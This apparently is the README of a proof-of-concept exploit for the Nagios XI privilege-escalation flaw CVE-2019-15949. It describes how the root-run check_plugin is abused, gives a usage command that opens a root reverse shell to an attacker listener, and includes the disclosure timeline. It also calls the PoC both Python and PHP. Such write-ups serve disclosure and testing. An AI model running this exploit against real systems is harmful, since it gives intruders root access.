
a PoC for the Nagios CVE-2019-15949 rce in python
um PoC em Python para o CVE-2019-15949
Existe uma vulnerabilidade no Nagios XI <= 5.6.5 que permite a um atacante explorar um RCE para escalar privilégios para root. O exploit requer acesso ao servidor como o usuário 'nagios', ou acesso ao CCM via interface web com permissões para gerenciar plugins.
O script getprofile.sh, invocado ao baixar um perfil do sistema (profile.php?cmd=download), é executado como root por meio de uma entrada sudo sem senha; o script executa o executável 'check_plugin', que pertence ao usuário nagios. Um usuário logado no Nagios XI com permissões para modificar plugins, ou o usuário 'nagios' no servidor, pode modificar o executável 'check_plugin' e inserir comandos maliciosos executáveis como root.
Um PoC em PHP foi desenvolvido, que envia um payload resultando em um shell reverso como root. Uso:
python3 exploit.py targetIp [ssl=false/true] username password Lhost lport
exemplo:
python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444
Reportado ao Nagios em: 29 de julho de 2019 Confirmado pelo Nagios em: 29 de julho de 2019 Corrigido na versão: 5.6.6 em: 20 de agosto de 2019 CVE Atribuído em: 6 de setembro de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)